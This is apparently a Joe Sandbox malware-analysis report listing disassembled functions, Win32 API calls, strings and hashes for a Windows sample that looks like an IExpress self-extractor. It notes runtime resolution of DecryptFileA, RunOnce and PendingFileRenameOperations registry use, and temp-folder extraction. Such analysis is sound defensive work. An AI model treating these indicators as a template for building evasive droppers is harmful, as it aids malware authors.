• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
• String ID: $124$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
• API String ID: 3100096412-1886169316
• Opcode ID: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
• Instruction ID: f3c8f2700eb690b1bb6caf369d1914ffc3f71905f425aadc2952a657b0530b38
• Opcode Fuzzy Hash: 8239ea3bc8d4f488818524f145e62419a79644bd439c5a8d4d2d204e9e9bee26
• Instruction Fuzzy Hash: 6C816A31A0C64386F721AB24AA803B966A1AF96755F50C035DB2DC26D1FF7FF505CAC0

Control-flow Graph
• Function 7ff6fd216f14-7ff6fd217291. Win32 APIs referenced in the graph: GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError, FormatMessageA. The GetLastError/FormatMessageA pairs (7ff6fd217062, 7ff6fd2171da) sit on the failure edges of GetVolumeInformationA and GetDiskFreeSpaceA, and SetCurrentDirectoryA is called again on both the success and error paths. Internal calls: 7ff6fd2186f0, 7ff6fd214f2c, 7ff6fd217958, 7ff6fd212520.
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: CurrentDirectory
• String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
• API String ID: 1611563598-1955631000
• Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
• Instruction ID: 88eaae5adb4678dd5cc5d5e51703c460ce51a54a2f9023d3abdfb8be3547e5a7
• Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
• Instruction Fuzzy Hash: 7FA15F36A18742C6E7208F20E5406AABBA1FB89744F548135EB5DC3795FF7EE5058BC0

Control-flow Graph
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
• String ID: *MEMCAB$CABINET
• API String ID: 1305606123-2642027498
• Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
• Instruction ID: b477bbfc3216b3a9b51b339d7d455606c40b207da19b6ef59697ee81a001ff2c
• Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
• Instruction Fuzzy Hash: 88510835A08A4286EB118B14EA543796AA0FF89749F94C135CA6EC27E5FF7EF044C7C0

Control-flow Graph
• Function 7ff6fd213214-7ff6fd2134bf. Win32 APIs referenced in the graph: GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary, GetWindowsDirectoryA, SetCurrentDirectoryA. The sequence LoadLibraryA (7ff6fd213283), GetProcAddress (7ff6fd2132c7), DecryptFileA (7ff6fd2132e2), FreeLibrary (7ff6fd2132fb), together with the advapi32.dll and DecryptFileA strings below, shows this import being resolved at run time rather than through the import table; this is the behaviour the report flags as "Contains functionality to dynamically determine API calls". Internal calls: 7ff6fd2161d4, 7ff6fd2168f0, 7ff6fd216294, 7ff6fd214064, 7ff6fd2186f0, 7ff6fd217e08, 7ff6fd214f2c, 7ff6fd217958, 7ff6fd216f14, 7ff6fd2123c0, 7ff6fd215f80, 7ff6fd217d28, 7ff6fd2141b4, 7ff6fd214a54, 7ff6fd217984.
Memory Dump Source
• Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
• Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
Similarity
• API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
• String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
• API String ID: 3010855178-3095882572
• Opcode ID: 3b920b10fcc1ab7df9fbf93181fb0f5156642c947c696f5af8ccee6cfbca0bf9
• Instruction ID: bb8705a032b9e86d520701362191582eb6cf93fe5e4c184156b8e122c40aa03c
• Opcode Fuzzy Hash: 3b920b10fcc1ab7df9fbf93181fb0f5156642c947c696f5af8ccee6cfbca0bf9
• Instruction Fuzzy Hash: BB713871E0C64386FB61AB15AB802B96AA1BF85740F50C035DB7DC22E1FF2EF84586C0

                                                                                                                Control-flow Graph

                                                                                                                 Control-flow graph (rendered graph not recoverable): function at 7ff6fd216710, basic blocks 7ff6fd216710-7ff6fd2168e6. Blocks in the graph call CreateDirectoryA (block 7ff6fd216856), GetSystemInfo (block 7ff6fd2167a3) and RemoveDirectoryA (block 7ff6fd2168aa), plus the internal subfunctions 7ff6fd2165a8, 7ff6fd216d9c, 7ff6fd216f14, 7ff6fd217958, 7ff6fd217e08 and 7ff6fd2186f0.
                                                                                                                APIs
                                                                                                                • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6FD212E07), ref: 00007FF6FD21685B
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF6FD212E07), ref: 00007FF6FD216643
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: GetFileAttributesA.KERNELBASE ref: 00007FF6FD216652
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: GetTempFileNameA.KERNEL32 ref: 00007FF6FD21667F
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: DeleteFileA.KERNEL32 ref: 00007FF6FD216697
                                                                                                                  • Part of subcall function 00007FF6FD2165A8: CreateDirectoryA.KERNEL32 ref: 00007FF6FD2166A8
                                                                                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6FD212E07), ref: 00007FF6FD2167A8
                                                                                                                • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF6FD212E07), ref: 00007FF6FD2168B4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                • API String ID: 1979080616-3881341942
                                                                                                                • Opcode ID: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                                                                                                                • Instruction ID: 45c7f0575d192ebc61e390072bf037af6212399f8316666a7007c7531f5bfe04
                                                                                                                • Opcode Fuzzy Hash: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                                                                                                                • Instruction Fuzzy Hash: 53515821A0C68285FB118B25AA103B967A4BF85781F99C135CB6DC26D1FF7FF409C2C0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 976364251-3916222277
                                                                                                                • Opcode ID: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                                                • Instruction ID: 08fd24f9cf44ca3329b9772fe4aac3bef2a281e9fd85b7686f6890e0e4476c5f
                                                                                                                • Opcode Fuzzy Hash: 67f5a8c114559d55dd8cf19d65e8c653d15ae20e01125bbcfa2d4a6a434563c8
                                                                                                                • Instruction Fuzzy Hash: 94515E3290CA8286E7608B10E654379B7A0FB88759F108135EB6DC26D4FF7DF4458BC0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$AddressCloseExitModuleProcVersionWindows
                                                                                                                • String ID: @$HeapSetInformation$Kernel32.dll
                                                                                                                • API String ID: 1302179841-1204263913
                                                                                                                • Opcode ID: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                                                • Instruction ID: 82d45d8334abff585ffc79961198b7d42e3185ca3cb8ef9bbc4d26a1d54a9bd5
                                                                                                                • Opcode Fuzzy Hash: 2f7390ff0c0d46cb9cdc5e9bd2078a34bdbe19e23de9cb8625d4c9295115e43e
                                                                                                                • Instruction Fuzzy Hash: 8B413A35E0864286FB649B61A6422B966A0BF49B44F54C035EB3DC22D5FF7FF445C6C0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                • String ID:
                                                                                                                • API String ID: 836429354-0
                                                                                                                • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                                                • Instruction ID: 21615bdc59876c8c341932f6cd9e701a89cdf4395ec4d25bc62c7fa4cf8af79d
                                                                                                                • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                                                                                                                • Instruction Fuzzy Hash: 93514C62618A8696EB018F20D9442E977A0FB45B84F84C271DB6DC36D5FF3EE509C3C0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFileFreeLocal$AttributesCloseCurrentDirectoryOpenValue
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                                                                • API String ID: 3049360512-2947520418
                                                                                                                • Opcode ID: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                                                • Instruction ID: 39bcb495aaaf87f094ae5aa20c421a562273d8852b5be93f686a9b4c23fd30c3
                                                                                                                • Opcode Fuzzy Hash: 412a7dec44b3798a2430baef0d9910c820e9379bb72a94b578006faa3a53e04f
                                                                                                                • Instruction Fuzzy Hash: 2C511A21A0868286EB108B14EA543B977A0FB85B46F94C131DB6DC36D5FF2EF448C7C0

                                                                                                                Control-flow Graph

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Directory$AttributesCreateDeleteNameRemoveTemp
                                                                                                                • String ID: IXP$IXP%03d.TMP
                                                                                                                • API String ID: 4001122843-3932986939
                                                                                                                • Opcode ID: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                                                • Instruction ID: fffab3cab413ed97ea3a2c9ac9902e8839dd5e77bb9212bbb5cd2f980329749c
                                                                                                                • Opcode Fuzzy Hash: cd7b86485b10685b83dcd6330150a770b90a6da73959a3ca5b2625007923a5f8
                                                                                                                • Instruction Fuzzy Hash: 34316F31708A8186EB109B15AA502B9BAA1FB89B85F45C131DF6EC37D5FF3EE445C6C0

                                                                                                                Control-flow Graph

                                                                                                                 Control-flow graph (rendered graph not recoverable): function at 7ff6fd218460, basic blocks 7ff6fd218460-7ff6fd2186d0. Blocks in the graph call GetStartupInfoW (block 7ff6fd218460), Sleep (block 7ff6fd2184da), _amsg_exit (block 7ff6fd2184cd), _initterm (block 7ff6fd218569), _ismbblead (block 7ff6fd21866f), exit (block 7ff6fd21863e) and _cexit (block 7ff6fd21864f), plus the internal subfunctions 7ff6fd212d70, 7ff6fd218b60 and 7ff6fd218bf4.
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                 • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                 • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Current$CountTickTime$CounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThread_amsg_exit_cexit_initterm_ismbbleadexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 2995914023-0
                                                                                                                • Opcode ID: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                                                • Instruction ID: e78ae67fbe1bc5c7247a4a4eff9f2d724b64b882b5ef9aacead35b30af5f637f
                                                                                                                • Opcode Fuzzy Hash: 452453f8cba86726c033ce9af079bec980333149c11a377a6a6421c59040ebf2
                                                                                                                • Instruction Fuzzy Hash: 5C612B35A0C646A6F7608B25EA90379A2E0FF48794F558035DB6DC22D4FF3EF94196C0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215220
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: SizeofResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215231
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FindResourceA.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215257
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LoadResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215268
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: LockResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD215277
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: memcpy_s.MSVCRT ref: 00007FF6FD215296
                                                                                                                  • Part of subcall function 00007FF6FD2151F8: FreeResource.KERNEL32(?,?,00000000,00007FF6FD212F6B), ref: 00007FF6FD2152A5
                                                                                                                • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF6FD21324B), ref: 00007FF6FD2162B9
                                                                                                                • LocalFree.KERNEL32 ref: 00007FF6FD216332
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: LoadStringA.USER32 ref: 00007FF6FD214FBC
                                                                                                                  • Part of subcall function 00007FF6FD214F2C: MessageBoxA.USER32 ref: 00007FF6FD214FFC
                                                                                                                  • Part of subcall function 00007FF6FD217958: GetLastError.KERNEL32 ref: 00007FF6FD21795C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                • String ID: $<None>$UPROMPT
                                                                                                                • API String ID: 957408736-2569542085
                                                                                                                • Opcode ID: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                                                • Instruction ID: 6051fb2a77e0ee2330a125af8c0f9e7638d7e3fbe4712d465b5b96a61f038dcf
                                                                                                                • Opcode Fuzzy Hash: bce953315df2136bd9c83a7e38e7c9bcfbdf6b05f60fc9f9bc5cb1955f243e78
                                                                                                                • Instruction Fuzzy Hash: A6314F71A0C24286E7205B20A65177E7A61FB85789F40D135DB6DC66D1FF7EF0448BC0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile$lstrcmp
                                                                                                                • String ID: *MEMCAB
                                                                                                                • API String ID: 1301100335-3211172518
                                                                                                                • Opcode ID: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                                                • Instruction ID: c35a26c82117787522ea0be20eb73f50ccfd48d6167d5823f41f1935e3418548
                                                                                                                • Opcode Fuzzy Hash: a2c1f66350d6024a7f804a88bc9b7da19f54bdbcb5e3280bfb267e90ce3ff26c
                                                                                                                • Instruction Fuzzy Hash: D461C462A0C78286F7618B14A6853797AA1EB45BA4F148371CB7DC27E0FF3DB40686C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileTime$AttributesDateItemLocalText
                                                                                                                • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                                                                • API String ID: 851750970-1955631000
                                                                                                                • Opcode ID: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                                                • Instruction ID: d211e5995b3fafd65130343c8111621dd939c36e9b9d0a502e750dabdb3a90c8
                                                                                                                • Opcode Fuzzy Hash: caf4f2272670990647462f14bfaf3187ac79d74cb37a0834bbd78866cb2a2d6f
                                                                                                                • Instruction Fuzzy Hash: 77514E22A19A4681EB619F21D6501BA63B0FB44B54F448272DB7EC36E8FE2EF545C7C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocLocal
                                                                                                                • String ID: TMP4351$.TMP
                                                                                                                • API String ID: 3494564517-2619824408
                                                                                                                • Opcode ID: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                                                • Instruction ID: 5518bd6cd218e1a9c6f2384461422a08efae454eb82afb639b1b4a420056fe3b
                                                                                                                • Opcode Fuzzy Hash: c669d64d882b60482da13300ba4968c1aecf883c3203920dff0371cbf708ca20
                                                                                                                • Instruction Fuzzy Hash: E7418B62A0868186FB104B24A6103BD7A90BB85BA5F588334DB7EC37D5FF7EE40587C0
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1326141463.00007FF6FD211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FD210000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1326123227.00007FF6FD210000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326159507.00007FF6FD219000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326179335.00007FF6FD21C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.1326199376.00007FF6FD21E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_7ff6fd210000_nTHivMbGpg.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager
                                                                                                                • API String ID: 3677997916-3057196482
                                                                                                                • Opcode ID: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                                                • Instruction ID: 316bdc45eff4ef82df49c5bc60ef308c7ba3005b5a7846247bd42fbd51a88119
                                                                                                                • Opcode Fuzzy Hash: 72a84aa0c0c68ebabc0f94760f7052dc41f3436717cb00a692564cbfb68d1e7c
                                                                                                                • Instruction Fuzzy Hash: 07114F36A08B5287E7109B14E55157AB6B0FF8A750F508135EBADC2798FF2EE4448A80
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6FD213C80: MsgWaitForMultipleObjects.USER32(?,?,?,?,?,?,?,?,?,00000001,00007FF6FD213B49), ref: 00007FF6FD213CA4
                                                                                                                  • Part of subcall function 00007FF6FD213C80: PeekMessageA.USER32 ref: 00007FF6FD213CC9
                                                                                                                  • Part of subcall function 00007FF6FD213C80: PeekMessageA.USER32 ref: 00007FF6FD213D0D
                                                                                                                • WriteFile.KERNELBASE ref: 00007FF6FD215924
                                                                                                                Memory Dump Source
